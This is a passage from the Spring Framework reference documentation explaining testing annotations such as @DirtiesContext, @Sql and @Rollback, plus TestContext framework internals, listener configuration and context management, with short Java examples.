It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\n+\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n* `@TestPropertySource`\n\n+\n\nA class-level annotation that is used to configure the locations of properties files and\ninlined properties to be added to the set of `PropertySources` in the `Environment` for\nan `ApplicationContext` loaded for an integration test.\n\n+ \n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\n+\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n* `@DirtiesContext`\n\n+\n\nIndicates that the underlying Spring `ApplicationContext` has been __dirtied__ during\nthe execution of a test (i.e., modified or corrupted in some manner -- for example, by\nchanging the state of a singleton bean) and should be closed. When an application\ncontext is marked __dirty__, it is removed from the testing framework's cache and\nclosed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n+\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. 
In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\n+\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n+\n\n** Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n** After the current test, when declared on a method with the method mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\n+\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n++ApplicationContext++s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. 
If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\n+\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n* `@TestExecutionListeners`\n\n+\n\nDefines class-level metadata for configuring which ++TestExecutionListener++s should be\nregistered with the `TestContextManager`. Typically, `@TestExecutionListeners` is used\nin conjunction with `@ContextConfiguration`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n`@TestExecutionListeners` supports __inherited__ listeners by default. See the javadocs\nfor an example and further details.\n\n+\n\n* `@Commit`\n\n+\n\nIndicates that the transaction for a transactional test method should be __committed__\nafter the test method has completed. `@Commit` can be used as a direct replacement for\n`@Rollback(false)` in order to more explicitly convey the intent of the code. Analogous to\n`@Rollback`, `@Commit` may also be declared as a class-level or method-level annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n* `@Rollback`\n\n+\n\nIndicates whether the transaction for a transactional test method should be __rolled\nback__ after the test method has completed. If `true`, the transaction is rolled back;\notherwise, the transaction is committed (see also `@Commit`). Rollback semantics for\nintegration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\n+\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. 
When declared as a\nmethod-level annotation, `@Rollback` defines rollback semantics for the specific test\nmethod, potentially overriding class-level `@Rollback` or `@Commit` semantics.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Rollback**(false)\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n* `@BeforeTransaction`\n\n+\n\nIndicates that the annotated `void` method should be executed __before__ a\ntransaction is started for test methods configured to run within a transaction via the\n`@Transactional` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@BeforeTransaction**\n\tvoid beforeTransaction() {\n\t\t\/\/ logic to be executed before a transaction is started\n\t}\n----\n\n* `@AfterTransaction`\n\n+\n\nIndicates that the annotated `void` method should be executed __after__ a\ntransaction has ended for test methods configured to run within a transaction via the\n`@Transactional` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@AfterTransaction**\n\tvoid afterTransaction() {\n\t\t\/\/ logic to be executed after a transaction has ended\n\t}\n----\n\n* `@Sql`\n\n+\n\nUsed to annotate a test class or test method to configure SQL scripts to be executed\nagainst a given database during integration tests.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\tpublic void userTest() {\n\t\t\/\/ execute code that relies on the test schema and test data\n\t}\n----\n\n+\n\nSee <<testcontext-executing-sql-declaratively>> for further details.\n\n* `@SqlConfig`\n\n+\n\nDefines metadata that is used to determine how to parse and execute SQL scripts\nconfigured via the `@Sql` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"\/test-user-data.sql\",\n\t\tconfig = **@SqlConfig**(commentPrefix = \"`\", separator = \"@@\")\n\t)\n\tpublic void userTest() {\n\t\t\/\/ execute code that relies on the test data\n\t}\n----\n\n* `@SqlGroup`\n\n+\n\nA container annotation that aggregates several `@Sql` annotations. Can be used natively,\ndeclaring several nested `@Sql` annotations. Can also be used in conjunction with Java\n8's support for repeatable annotations, where `@Sql` can simply be declared several times\non the same class or method, implicitly generating this container annotation, as sketched below.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@SqlGroup**({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t})\n\tpublic void userTest() {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----
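\n\n+\n\nFor example, the repeatable-annotation style equivalent to the `@SqlGroup` declaration above could be sketched as follows:\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\"))\n\t**@Sql**(\"\/test-user-data.sql\")\n\tpublic void userTest() {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n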
[[integration-testing-annotations-standard]]\n==== Standard Annotation Support\nThe following annotations are supported with standard semantics for all configurations\nof the Spring TestContext Framework. Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework, `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit's `@Before`), and that will apply for every test method in the test\nclass. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit]]\n==== Spring JUnit Testing Annotations\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, <<testcontext-junit4-rules,Spring's JUnit\nrules>>, or <<testcontext-support-classes-junit4,Spring's JUnit support classes>>.\n\n* `@IfProfileValue`\n\n+\n\nIndicates that the annotated test is enabled for a specific testing environment. If the\nconfigured `ProfileValueSource` returns a matching `value` for the provided `name`, the\ntest is enabled. Otherwise, the test will be disabled and effectively _ignored_.\n\n+\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. 
This is analogous to the\nsemantics of JUnit's `@Ignore` annotation, except that the presence of `@Ignore` always\ndisables a test.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"java.vendor\", **value**=\"Oracle Corporation\")\n\t@Test\n\tpublic void testProcessWhichRunsOnlyOnOracleJvm() {\n\t\t\/\/ some logic that should run only on Java VMs from Oracle Corporation\n\t}\n----\n\n+\n\nAlternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__\nsemantics) to achieve TestNG-like support for __test groups__ in a JUnit environment.\nConsider the following example:\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"test-groups\", **values**={\"unit-tests\", \"integration-tests\"})\n\t@Test\n\tpublic void testProcessWhichRunsForUnitOrIntegrationTestGroups() {\n\t\t\/\/ some logic that should run only for unit and integration test groups\n\t}\n----\n\n* `@ProfileValueSourceConfiguration`\n\n+\n\nClass-level annotation that specifies what type of `ProfileValueSource` to use when\nretrieving __profile values__ configured through the `@IfProfileValue` annotation. If\n`@ProfileValueSourceConfiguration` is not declared for a test,\n`SystemProfileValueSource` is used by default.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)\n\tpublic class CustomProfileValueSourceTests {\n\t\t\/\/ class body...\n\t}\n----\n\n* `@Timed`\n\n+\n\nIndicates that the annotated test method must finish execution in a specified time\nperiod (in milliseconds). If the test execution time exceeds the specified time period,\nthe test fails.\n\n+\n\nThe time period includes execution of the test method itself, any repetitions of the\ntest (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Timed**(millis=1000)\n\tpublic void testProcessWithOneSecondTimeout() {\n\t\t\/\/ some logic that should not take longer than 1 second to execute\n\t}\n----\n\n+\n\nSpring's `@Timed` annotation has different semantics than JUnit's `@Test(timeout=...)`\nsupport. Specifically, due to the manner in which JUnit handles test execution timeouts\n(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`\npreemptively fails the test if the test takes too long. Spring's `@Timed`, on the other\nhand, does not preemptively fail the test but rather waits for the test to complete\nbefore failing.\n\n* `@Repeat`\n\n+\n\nIndicates that the annotated test method must be executed repeatedly. 
The number of\ntimes that the test method is to be executed is specified in the annotation.\n\n+\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nSince Spring Framework 4.0, it is possible to use test-related annotations as\n<<beans-meta-annotations,meta-annotations>> in order to create custom _composed annotations_\nand reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat`\n* `@Timed`\n* `@IfProfileValue`\n* `@ProfileValueSourceConfiguration`\n\nFor example, if we discover that we are repeating the following configuration\nacross our JUnit-based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_\nthat centralizes the common test configuration like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTest { }\n----\n\nThen we can use our custom `@TransactionalDevTest` annotation to simplify the\nconfiguration of individual test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class UserRepositoryTests { }\n----\n\nFor further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.\n\n\n[[testcontext-framework]]\n=== Spring TestContext Framework\nThe __Spring TestContext Framework__ (located in the\n`org.springframework.test.context` package) provides generic, annotation-driven unit and\nintegration testing support that is agnostic of the testing framework in use. The\nTestContext framework also places a great deal of importance on __convention over\nconfiguration__ with reasonable defaults that can be overridden through annotation-based\nconfiguration.\n\nIn addition to generic testing infrastructure, the TestContext framework provides\nexplicit support for JUnit and TestNG in the form of `abstract` support classes. 
For\nJUnit, Spring also provides a custom JUnit `Runner` and custom JUnit `Rules` that allow\none to write so-called __POJO test classes__. POJO test classes are not required to\nextend a particular class hierarchy.\n\nThe following section provides an overview of the internals of the TestContext\nframework. If you are only interested in using the framework and not necessarily\ninterested in extending it with your own custom listeners or custom loaders, feel free\nto go directly to the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContext` and `TestContextManager` classes\nand the `TestExecutionListener`, `ContextLoader`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created on a per-test basis (e.g., for the execution of a single\ntest method in JUnit). The `TestContextManager` in turn manages a `TestContext` that\nholds the context of the current test. The `TestContextManager` also updates the state\nof the `TestContext` as the test progresses and delegates to ++TestExecutionListener++s,\nwhich instrument the actual test execution by providing dependency injection, managing\ntransactions, and so on. A `ContextLoader` (or `SmartContextLoader`) is responsible for\nloading an `ApplicationContext` for a given test class. Consult the javadocs and the\nSpring test suite for further information and examples of various implementations.\n\n* `TestContext`: Encapsulates the context in which a test is executed, agnostic of the\n actual testing framework in use, and provides context management and caching support\n for the test instance for which it is responsible. The `TestContext` also delegates to\n a `ContextLoader` (or `SmartContextLoader`) to load an `ApplicationContext` if\n requested.\n* `TestContextManager`: The main entry point into the __Spring TestContext Framework__,\n which manages a single `TestContext` and signals events to all registered\n ++TestExecutionListener++s at well-defined test execution points:\n** prior to any __before class methods__ of a particular testing framework\n** test instance preparation\n** prior to any __before methods__ of a particular testing framework\n** after any __after methods__ of a particular testing framework\n** after any __after class methods__ of a particular testing framework\n* `TestExecutionListener`: Defines a __listener__ API for reacting to test execution\n events published by the `TestContextManager` with which the listener is registered. See\n <<testcontext-tel-config>>.\n* `ContextLoader`: Strategy interface introduced in Spring 2.5 for loading an\n `ApplicationContext` for an integration test managed by the Spring TestContext\n Framework.\n\n+\n\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and ++WebApplicationContext++s.\n\n* `SmartContextLoader`: Extension of the `ContextLoader` interface introduced in Spring\n 3.1.\n\n+\n\nThe `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was introduced in\nSpring 2.5. 
Specifically, a `SmartContextLoader` can choose to process resource\n`locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\n+\n\nSpring provides the following implementations:\n\n+\n\n** `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n** `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n** `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n** `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n** `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n** `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n** `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\nThe following sections explain how to configure the TestContext framework through\nannotations and provide working examples of how to write unit and integration tests with\nthe framework.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ++TestExecutionListener++s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. 
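For example, a custom listener might extend Spring's `AbstractTestExecutionListener` and\nbe registered as shown in the following sketch (the `MyCustomTestExecutionListener` and\n`CustomListenerTests` class names are purely illustrative):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ hypothetical listener that overrides only the callback it needs\n\tpublic class MyCustomTestExecutionListener extends AbstractTestExecutionListener {\n\n\t\t@Override\n\t\tpublic void beforeTestMethod(TestContext testContext) {\n\t\t\t\/\/ custom logic to be executed before each test method\n\t\t}\n\t}\n\n\t@ContextConfiguration\n\t**@TestExecutionListeners**(MyCustomTestExecutionListener.class)\n\tpublic class CustomListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\nKeep in mind that registering listeners this way replaces the default listeners unless\nthey are explicitly merged as described in <<testcontext-tel-config-merging>>. 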
See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ++TestExecutionListener++s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. Since Spring\nFramework 4.1, this issue is addressed via support for automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n++TestExecutionListener++s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. Third-party frameworks and developers can\ncontribute their own ++TestExecutionListener++s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ++TestExecutionListener++s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n++TestExecutionListener++s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ++TestExecutionListener++s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ++TestExecutionListener++s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1, and `DirtiesContextBeforeModesTestExecutionListener`\nwas introduced in Spring Framework 4.2. 
Furthermore, third-party frameworks like Spring\nSecurity register their own default ++TestExecutionListener++s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. 
For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting 